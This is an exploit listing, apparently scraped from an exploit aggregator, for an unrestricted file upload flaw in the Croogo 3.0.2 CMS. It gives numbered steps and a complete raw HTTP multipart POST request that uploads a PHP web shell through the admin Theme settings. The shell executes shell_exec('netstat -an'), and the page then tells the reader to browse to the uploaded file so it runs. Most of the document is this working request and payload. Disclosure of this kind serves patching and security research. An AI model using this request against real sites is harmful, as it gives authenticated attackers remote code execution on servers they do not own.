Exploit for Croogo 3.0.2 Shell Upload

Name: Exploit for Croogo 3.0.2 Shell Upload
Rating: 5 (207 reviews)
2021-12-16 | CVSS -0.2
## https://sploitus.com/exploit?id=PACKETSTORM:165323
# Exploit Title: Croogo 3.0.2 - Unrestricted File Upload  
# Date: 06/12/2021  
# Exploit Author: Enes Özeser  
# Vendor Homepage: https://croogo.org/  
# Software Link: https://downloads.croogo.org/v3.0.2.zip  
# Version: 3.0.2  
# Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3  
  
==> 'setting-43' Unrestricted File Upload <==  
  
1- Login with your privileged account.  
2- Click on the 'Settings' section.  
3- Go to the 'Themes'. Directory is '/admin/settings/settings/prefix/Theme'  
4- Choose a malicious php script and upload it.  
5- Go to the '/uploads/(NAME).php' directory. You must change 'NAME' parameter with your filename you uploaded.  
6- The malicious PHP script will be executed.  
  
POST /admin/settings/settings/prefix/Theme HTTP/1.1  
Host: (HOST)  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------360738881613175158033315978127  
Content-Length: 970  
Origin: http://(HOST)  
Connection: close  
Referer: http://(HOST)/admin/settings/settings/prefix/Theme  
Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
  
-----------------------------360738881613175158033315978127  
Content-Disposition: form-data; name="_method"  
  
POST  
-----------------------------360738881613175158033315978127  
Content-Disposition: form-data; name="_csrfToken"  
  
c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a  
-----------------------------360738881613175158033315978127  
Content-Disposition: form-data; name="setting-43"; filename="malicious.php"  
Content-Type: application/octet-stream  
  
<?php  
$command = shell_exec('netstat -an');  
echo "<pre>$command</pre>";  
?>  
  
-----------------------------360738881613175158033315978127  
Content-Disposition: form-data; name="_Token[fields]"  
  
c4e0a45b25b5eaf8fa6e0e4ddcd3be00c621b803%3A  
-----------------------------360738881613175158033315978127  
Content-Disposition: form-data; name="_Token[unlocked]"  
  
  
-----------------------------360738881613175158033315978127--